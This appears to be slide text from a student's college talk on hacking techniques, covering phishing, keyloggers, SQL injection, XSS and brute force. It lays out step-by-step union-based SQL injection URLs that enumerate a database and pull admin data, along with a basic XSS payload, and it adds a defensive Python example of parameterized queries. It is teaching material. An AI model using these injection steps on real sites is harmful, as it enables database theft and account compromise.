I presented this in my graduation college in front of my classmates, wherein I described various types of hacking techniques used by the "Bad Guys" and also how to mitigate them.
5. Some hacking techniques to hack a Facebook or a Gmail account:
1. Phishing
2. Key Loggers
3. Trojans/Backdoors
6. What is Phishing?
It's a way of hacking where a hacker tricks his victim by making him/her log in to a website which is made to look identical to the legitimate one. After the victim logs in, this fake website will acquire his information (username and password) and send it to the hacker.
10. SQL Injection
• SQL Injection is a method of injecting SQL queries into the website. By injecting malicious queries, a hacker can easily:
1. Bypass the authentication
2. Grab the structure of the database
3. Grab the sensitive data
11. SQLi methods
• Basically we will divide our SQL injection methods into different types:
1. Authentication Bypass
2. Union Based Injection
12. Authentication Bypass
To log in to the admin login.php page, whenever the admin enters the admin id and password, a query will be executed on the admin login table. The query will look somewhat like:
select * from admin_login where admin_id='<value>' and pass='<value>';
i.e.: select * from admin_login where admin_id='admin' and pass='admin pass';
13. SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).
Union Based Injection
20. 3) Union select 1,2,3,4--
http://www.site.com/product.php?id=4 union select 1,2,3,4--
The visible column number is 2, so we can replace it.
21. 4) Check the version, database or user by applying:
union select 1,database(),3,4 --
http://www.site.com/product.php?id=4 union select 1,database(),3,4--
22. 5) To see the table names:
http://www.site.com/product.php?id=5 union select 1,2,table_name,4 from information_schema.tables --
23. 6) Find the column names of the table:
http://www.site.com/products.php?id=5 union select 1,2,column_name,4,5 from information_schema.columns where table_name='tbl_admin' --
24. 7) Get the data from the database:
http://www.site.com/products.php?id=5 union select 1,2,adminid,4 from admin --
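As a defensive counterpart to the union-based steps above, this added example (not part of the original slides) runs the `union select 1,2,3,4--` input from slide 20 against a concatenated query and against a parameterized one. It uses Python with an in-memory SQLite table as a stand-in for the PHP/MySQL `product.php` page; the table, column and function names are assumptions.

```python
import re
import sqlite3

ROW_4 = (4, "Lamp", "lighting", "Desk lamp")

def make_db():
    # Constructed sample data: a 4-column table standing in for the one
    # behind product.php (table and column names are assumptions).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products "
               "(id INTEGER PRIMARY KEY, name TEXT, category TEXT, descr TEXT)")
    db.executemany("INSERT INTO products VALUES (?, ?, ?, ?)",
                   [ROW_4, (5, "Chair", "furniture", "Office chair")])
    return db

def lookup_vulnerable(db, raw_id):
    # Weak pattern: the id parameter is pasted into the SQL text, so whatever
    # follows the number is parsed as SQL too.
    sql = "SELECT id, name, category, descr FROM products WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_parameterized(db, raw_id):
    # Hardened: the SQL text is fixed and the value is bound separately, so it
    # can only ever be compared with the id column.
    sql = "SELECT id, name, category, descr FROM products WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

def lookup_validated(db, raw_id):
    # Defence in depth: accept only a short decimal id before querying.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a decimal number")
    return lookup_parameterized(db, int(raw_id))

if __name__ == "__main__":
    db = make_db()
    slide_input = "4 union select 1,2,3,4--"   # input from slide 20
    print("concatenated :", lookup_vulnerable(db, slide_input))
    print("parameterized:", lookup_parameterized(db, slide_input))
    try:
        lookup_validated(db, slide_input)
    except ValueError as exc:
        print("validated    : rejected,", exc)
```

With the concatenated query the extra `1,2,3,4` row comes back alongside the product; with the bound parameter the same input matches no row, and the validating wrapper rejects it before any query runs.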
25. 1) A type of vulnerability typically found in Web applications.
2) Enables attackers to inject client-side script into Web pages viewed by other users.
26. 1. DOM-Based Attack:-
A DOM-Based attack is a more advanced attack where the attacker's payload (malicious script) is executed as a result of the original client-side script modifying the DOM environment in the victim's browser. This causes the client-side code to run in an unexpected manner.
27. 2. Persistent XSS Attack:-
A persistent XSS attack is a method in which the attacker's payload is permanent to the server's code and will remain there for every user to see until a server admin removes it.
28. 3. Non-Persistent XSS Attack:-
A non-persistent XSS attack is a method in which the attacker's payload is not permanent, meaning it doesn't affect the server's internal code. An example of this would be a link that has a non-persistent attack embedded into it.
29. Let's Attack
What do we need to perform it?
I. A vulnerable website
II. A text box (may be a search box or any text box) in the site
30. Let's try putting in the most known, BASIC query of all time.
Code:-
<script>alert("XSS")</script>
31. We will get the result of our attack by the XSS code like a popup box… Like this…
32. Brute-Force Attack
Any password can be cracked using a brute-force attack. Brute-force attacks try every possible combination of numbers, letters and special characters until the right password is matched.
33. Credits:
1) Lucideus Tech
2) Tyagi Sir
3) Aman Sir
4) Andy
5) Of course me :P